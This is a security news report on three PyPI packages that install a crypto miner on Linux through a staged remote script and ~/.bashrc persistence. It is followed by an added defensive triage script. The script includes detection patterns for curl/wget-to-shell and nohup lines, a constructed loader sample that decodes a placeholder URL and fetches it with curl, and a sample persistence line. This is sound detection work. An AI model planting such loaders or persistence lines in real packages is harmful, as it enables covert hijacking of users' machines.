Fortinet researchers identified three malicious packages in the PyPI repository—modularseven, driftme, and catme. These packages, attributed to the same author, “sastra,” were specifically crafted to target Linux systems and install crypto mining software. Notably, the author created a PyPI account shortly before uploading these packages.
3 Malicious PyPI Packages
“Upon initial use, these packages deploy a CoinMiner executable on Linux devices,” noted Fortinet FortiGuard Labs researcher Gabby Xiong. She highlighted that this campaign exhibits similarities with a previous one that utilized a package named “culturestreak” to install a crypto miner.
The malicious code is embedded in the package's __init__.py file, which decodes and fetches the first stage from a remote server. This first stage is a shell script ("unmi.sh") that retrieves a configuration file for the mining operation and the CoinMiner binary hosted on GitLab.
The ELF binary is executed in the background with the nohup command, so the process survives the end of the login session. As with the earlier 'culturestreak' package, these packages keep the payload out of the package itself, hosting it at a remote URL to reduce detectability, and deliver it in successive stages to carry out the malicious activity.
The connection to the culturestreak package is evident as the configuration file is hosted on the domain papiculo[.]net, and the coin mining executables are hosted on a public GitLab repository.
A notable enhancement in the three new packages is the incorporation of an additional stage, concealing their malicious intent within the shell script. This strategy aids in evading detection by security software and prolongs the exploitation process.
“Furthermore, the malware injects malicious commands into the ~/.bashrc file,” Xiong explained. “This inclusion guarantees the persistence and reactivation of the malware on the user’s device, effectively prolonging the duration of its covert operation. This approach facilitates the extended and discreet exploitation of the user’s device for the attacker’s advantage.”
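As an added defensive example (not Fortinet's code and not code from the packages described), the script below triages the two artefacts the article names: a package __init__.py that decodes and then fetches its next stage, and ~/.bashrc lines that relaunch a background process. The sample inputs are constructed; only the domain papiculo[.]net, the script name unmi.sh and the use of nohup come from the article, while every other indicator, path and URL is a placeholder or generic heuristic.

```python
"""Triage helpers for the staged PyPI loader pattern described in the article.

Added example, not Fortinet's or the packages' code. Scans package
__init__.py sources for decode-then-fetch-then-execute combinations and
surfaces base64-obfuscated strings, and scans a shell rc file for
persistence lines. Indicators beyond those named in the article are
assumptions / heuristics.
"""
import base64
import re
from pathlib import Path

# Source-level indicators in a package's __init__.py (generic heuristics).
DECODE_PATTERNS = [r"base64\.b64decode", r"codecs\.decode", r"bytes\.fromhex"]
FETCH_PATTERNS = [r"urllib\.request\.urlopen", r"requests\.get", r"\bcurl\b", r"\bwget\b"]
EXEC_PATTERNS = [r"subprocess\.", r"os\.system", r"os\.popen", r"\bexec\(", r"\beval\("]

# Persistence indicators for ~/.bashrc lines. The domain and script name
# are from the article; the nohup / pipe-to-shell rules are generic.
RC_PATTERNS = [
    r"papiculo\.net",
    r"unmi\.sh",
    r"\bnohup\b.*&\s*$",
    r"(curl|wget)\b.*\|\s*(ba)?sh\b",
]


def _hits(text, patterns):
    """Return the sorted subset of patterns that match somewhere in text."""
    return sorted({p for p in patterns if re.search(p, text)})


def decoded_strings(text):
    """Decode long base64 literals in the source so hidden URLs become visible."""
    out = []
    for lit in re.findall(r"['\"]([A-Za-z0-9+/=]{16,})['\"]", text):
        try:
            s = base64.b64decode(lit, validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue
        if s.isprintable():
            out.append(s)
    return out


def triage_init(text):
    """Classify one __init__.py source; suspicious = decode combined with fetch or exec."""
    decode = _hits(text, DECODE_PATTERNS)
    fetch = _hits(text, FETCH_PATTERNS)
    execute = _hits(text, EXEC_PATTERNS)
    decoded = decoded_strings(text)
    if any("://" in s for s in decoded):
        fetch = sorted(set(fetch) | {"decoded-url"})
    suspicious = bool(decode) and bool(fetch or execute)
    return {"decode": decode, "fetch": fetch, "exec": execute,
            "decoded": decoded, "suspicious": suspicious}


def triage_rc(text):
    """Return (line_no, line, matched_patterns) for every rc line that hits."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        hits = _hits(line, RC_PATTERNS)
        if hits:
            findings.append((n, line.strip(), hits))
    return findings


def scan_site_packages(root):
    """Walk a site-packages tree and return the suspicious __init__.py files."""
    results = {}
    for init in Path(root).rglob("__init__.py"):
        r = triage_init(init.read_text(errors="replace"))
        if r["suspicious"]:
            results[str(init)] = r
    return results


# ---- constructed samples (placeholders, not real indicators) ----
PLACEHOLDER_URL = "http://placeholder.invalid/stage1.sh"
SAMPLE_B64 = base64.b64encode(PLACEHOLDER_URL.encode()).decode()

BENIGN_INIT = '__version__ = "1.0.0"\nfrom .core import run\n'

SUSPICIOUS_INIT = f'''
import base64, subprocess
u = base64.b64decode("{SAMPLE_B64}").decode()
subprocess.run(["curl", "-s", u])
'''

SAMPLE_RC = "\n".join([
    "export PATH=$HOME/bin:$PATH",
    "alias ll='ls -la'",
    "nohup /tmp/.placeholder/bin/x -c /tmp/.placeholder/c.json >/dev/null 2>&1 &",
])

if __name__ == "__main__":
    print("benign:", triage_init(BENIGN_INIT)["suspicious"])
    print("suspicious:", triage_init(SUSPICIOUS_INIT))
    for finding in triage_rc(SAMPLE_RC):
        print("rc:", finding)
```

The decode/fetch/exec split is deliberate: a base64 call on its own is common in legitimate packages, so a file is only flagged when decoding is paired with a network fetch or a process launch, and any decoded literal that turns out to be a URL is added to the fetch evidence so the reviewer sees the hidden endpoint without running the package.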